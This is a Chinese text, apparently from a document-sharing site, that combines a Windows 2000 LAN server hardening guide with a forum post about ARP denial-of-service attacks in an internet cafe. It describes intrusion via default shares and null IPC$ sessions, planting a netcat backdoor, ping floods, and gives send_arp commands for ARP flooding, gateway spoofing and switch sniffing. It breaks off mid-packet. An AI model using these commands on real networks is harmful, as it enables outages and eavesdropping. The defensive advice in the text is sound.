防范局域网内服务器入侵

《防范局域网内服务器入侵》由会员分享，可在线阅读，更多相关《防范局域网内服务器入侵（12页珍藏版）》请在金锄头文库上搜索。

1、防范局域网内服务器入侵防范局域网内服务器入侵防范共享入侵 比如，在某局域网中，服务器装有 Win2000Server 系统且采用 NTFS 分区，客户机计算 机分别为 Workl、Work2WorkN，并装有 Win98 或 Win2000Pro 系统。假如其中一台 客户机的用户名为 YD_xlpos，密码为 Ei（9，已经登录到域 domain，则它可使用默认共享 方式入侵服务器：在该客户机的网络邻居地址栏中输入serveradmin$，便可进入 Win2000 的系统目录 WinNT，此时该用户可以删除文件。若再输入serverd$，即可进入服务器上 的 D 盘，此时该客户机用户已经具备服

2、务器的管理员权限，这是相当危险的。居心叵测的 人可以通过新建 Winstart.bat 或者 Wininit.ini 文件，并在其中加入格式化 C 盘的语句，使系 统丢失所有 C 盘文件;或是在服务器的启动项中加入现在任何流行木马的启动程序，后果 也不堪设想。 Win2000 采用默认共享方式以便远程维护，但同样给了黑客可乘之机。打开注册表编辑器， 定位到HKEY_L0CAl_MACHINESYSTEMCurrentControlSetServiceslanmanserver，若系统 为 Win2000Pro，则新建 Autosharewks 的 DWORD 值，并设键值为 0；若系统为Win

3、2000Server，则新建 Autoshareserver 的 DWORD 值，并设键值为 0。重新启动计算机 后默认共享便不会再出现。 不过危险并没有消除，装有 Win2000 平台的客户机还可以通过 IPS$的空连接入侵服务器。 客户机用户可以先用端口扫描软件 X-Scan 填入服务器的 IP，在扫描模块里选择 sqlserver 弱口令和 nt-server 弱口令，当得到 nt-server 弱口令后，可在客户机的 cmd 窗口中输入“netuse192.168.0.88ips$user：用户”来建立空连接，然后激活 Guest，并添加管 理员权限，安装后门(如 netcat)后就可

4、以进行远程控制。管理员怎么禁止 IPS$空连接呢?可 定位到注册表 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA,修 改 RestrictAnony-mous 的 DWORD 值为 0000001。 防范 Ping 入侵 Ping 入侵方式也叫 ICMP 入侵，它也利用了 Windows 系统的漏洞。在 Work1 的 DOS 窗口 中输入“ping-165500-t192.168.0.88”(服务器的 IP 地址)，则可看到服务器上系统托 盘的小电脑一直在闪动，那是客户机 Work1 在向服务器发出请求。我们试想，如果局域网 内的计算

5、机很多，并在每台计算机的 Aotoexec.bat 文件中加入“ping-l65500-t192.168.0.88” ，那会怎么样?服务器将会因 CPU 使用率居高不下而崩溃，这也就是有名的 DoS 服务(拒绝服务)攻击：在一个时段内连续向服务器发出大量请求，服务器来不及回应 而死机。 对付这类攻击可安装网络防火墙，如天网等，在设置里面选择“不允许别人用 Ping 命令探 测本机”;或者在“管理工具”中点击“本地安全策略” ，进入“IP 安全策略” ，在本地机 器中进行设置(设置过程略)。 维护和管理服务器 黑客入侵服务器，必须知道服务器的 IP 地址和所开放的端口，因此可以在网上邻居中隐藏

6、服务器的 IP 地址，为服务器的计算机名保密。建立服务器通讯端口列表，屏蔽一些敏感的 端口如 139、3389、5000,了解部分病毒或者木马的常用连接端口，如“冰河”的 7626 端 口、 “广外女生”的 6267 端口。 安装病毒防火墙和网络防火墙，定期对病毒库进行更新，按计划查毒杀毒。定期用 DOS 命 令 netstat-a 或者 SuperScan 软件对服务器开放的端口进行检测，将检测结果和以往备份 的端口列表进行比较。若发现未知端口有异常连接建立或者正在监听，特别是高端端口，则立即断开网络，用检测木马的软件如 TrojanRemover 等进行检测。用进程检测软件如 Window

7、s 优化大师监测服务器所开的进程，并和以往的进程列表作比较，留意不明进程。 注意观察 Win2000 的服务，因为它是在系统启动前加载的。可将TaskScheduler、RunAsService、FTP 等改为手动，最好能够了解各种服务的作用， 了解服务器所开的共享，可用 netshare 命令来查看。尽可能不要设置文件共享，不要打 开写文件的权限。即使开启共享，也应设置相应密码。 打开“计算机管理” ，检查用户和组里是否有非法用户，尤其小心管理员权限的非法用户。 禁止系统提供的 Guest 用户，因为黑客常用 Guest 进行系统控制，对于 Administrator 则应 进行改名操作。在

8、 C:DocumentsandSettings 下查看用户，对于有非法用户的目录，应 仔细察看并定期对事件查看器进行筛选和分析。审核安全日志，选择“管理工具”里面的 “本地安全策略” ，在本地策略里的审核策略中进行审核操作。 若英文功底良好，则推荐使用 Win2000 英文版，因为中文版的 Bug 较多，补丁推出也相对 较晚。多去微软的站点检测，及时更新微软的 SP 补丁包，注意微软发布的安全公告。了 解病毒和系统漏洞的最新动态，堵上系统存在的漏洞。对于系统管理员，则要合理选择安 装相关组件，不需要的不必安装，当然需要的组件除外，如网络监视器。另外，尽量修改 一些特殊的 DOS 命令的扩展名，

9、尽量少用超级用户登录，其密码也要做到科学配置，大小 写加特殊字符，从而减低被暴力破解的几率。 此外，系统管理员不要私自在服务器上试用新软件，尤其是大型软件和 Beta 版软件，不要 用服务器作为上网的主机，不要让不具备权限的人接近服务器。Win2000Server 系统的 稳定性和安全性还是非常高的，系统的崩溃多由于人为的误删除或者误操作所致。 总之，服务器的安全问题应引起极大的重视，应挂接多个硬盘做好备份，使服务器在出错 后能够快速恢复。 防御局域网攻击防御局域网攻击 ZT我一个朋友的网吧最近遭受一种奇怪的攻击，他网吧一共有 60 台机器，和另外 6 个网吧并 在一个网段中，IP 地址从 1

10、92.168.0.1192.168.0.255，大家共用 CS 服务器和 WEB 及流媒 体服务器，其中一台 CS 服务器和流媒体服务器在他网吧里。 最近每晚和中午，他网吧客满的时候，就有人在网内对他网吧的 IP 段进行攻击。表现是大 面积 IP 地址冲突，造成机器暂时停止网络响应，而且网络中的 CS 服务器和流媒体服务器 马上停止响应。一般持续半小时以上，IP 冲突的速度大约 10 秒一次。连续几天都是如此， 造成他很大损失。 我朋友求助于我，于是我先试验了一下，证明故意修改 IP 的方式是无法造成服务器失去响 应的，于是我在他网吧两台机器上安装了一些监测软件，试图捕捉对方的攻击数据包，然

11、后再取得对方的 MAC 地址来查找攻击来源。由于主要表现是 IP 冲突，所以我使用 commview3 专门捕捉所有的 ARP 协议包，结果在晚上对方攻击时果然发现出现了大量有 规律的 ARP 广播包，那些包明显是某种软件生成的，MAC 地址是随机伪造的，IP 地址就 是他网吧的系列 IP，这种包和一般开机的包不同，是 pass-thourgh 包，机器收到后 98 系统 马上失去网络响应，只有等很长时间或者重起，2K 系统也马上失去响应，必须点确定才能 恢复，但是所有连接的用户都 Time Out 了。 由于包里 MAC 地址是伪造的，所以我无法查到来源，于是我去网上查找了一些资料，证 明这

12、是一种 ARP 拒绝服务攻击，但是没找到任何有效防范办法，微软也没有相应的补丁。 唯一的办法除非在网络中使用路由器屏蔽 ARP，用硬件存储 ARP 列表，但是路由器不是 一个小网吧可以承担的设备。当然如果划分网段，再用网关把他和大家隔开也可以，因为 ARP 只在一个网段传播，但是这样别人就无法共用他们的服务器，而且破坏者也可以到他网吧来继续破坏，这也是不行的。 我又试用了各种防火墙软件，证明也无法拦住这样的攻击包，没有一个防火墙产品可以屏 蔽非法的 ARP 包。使用天网 2.5 和金山网镖，甚至用断开网络选项都无法挡住攻击。 我后来在网上找到了一个叫做“” （为防止别有用心的人用来干坏事，我略

13、去这个软件 的名字，转贴者也就是本人注）的软件，果然可以达到这个效果，证明这样的攻击软件在 网上是大量存在的，大家可以去 google 里搜索下载这个软件。 我现在唯一能告诉他的办法就是遇到攻击就拔网线，各位高手，还有没有什么低廉方便的 手段能解决这个问题啊，我朋友都急死了，再这样他的网吧就做不下去了。 请大家帮帮忙！谢谢：） 分析: 网上关于 ARP 的资料已经很多了，就不用我都说了。 用某一位高手的话来说， “我们能做的事情很多，唯一受 限制的是我们的创造力和想象力” 。 ARP 也是如此。 以下讨论的机子有 一个要攻击的机子：10.5.4.178 硬件地址：52:54:4C:98:EE:

14、2F 我的机子： :10.5.3.69 硬件地址：52:54:4C:98:ED:C5 网关： 10.5.0.3 硬件地址：00:90:26:3D:0C:F3 一台交换机另一端口的机子：10.5.3.3 硬件地址：52:54:4C:98:ED:F7 一：用 ARP 破 WINDOWS 的屏保 原理：利用 IP 冲突的级别比屏保高，当有冲突时，就会 跳出屏保。 关键：ARP 包的数量适当。 rootsztcww tools# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 10.5.4.178 52:54:4C:98:EE:2F 40 二：用 ARP 导致 IP 冲

15、突，死机 原理：WINDOWS 9X，NT4 在处理 IP 冲突时，处理不过来，导致死机。 注： 对 WINDOWS 2K，LINUX 相当于 flooding,只是比一般的 FLOODING 有效的多.对 LINUX，明显系统被拖慢。 rootsztcww tools# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 10.5.4.178 52:54:4C:98:EE:2F 999999999 三：用 ARP 欺骗网关，可导致局域网的某台机子出不了网关。 原理：用 ARP 应答包去刷新对应着要使之出不去的机子。 rootsztcww tools# ./send

16、_arp 10.5.4.178 52:54:4C:98:EE:22 10.5.4.178 00:90:26:3D:0C:F3 1 注意：如果单单如上的命令，大概只能有效几秒钟，网关机子里的 ARP 高速缓存会被被攻击的机子正确刷新，于是只要. 四：用 ARP 欺骗交换机，可监听到交换机另一端的机子。 可能需要修改一下 send_arp.c,构造如下的数据包。 ethhdr srchw:52:54:4C:98:ED:F7-dsthw:FF:FF:FF:FF:FF:FF proto:806H arphdr hwtype:1 protol:800H hw_size:6 pro_size:4 op:1 s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3 d_ha:00:00:00:00:00:00 d_ip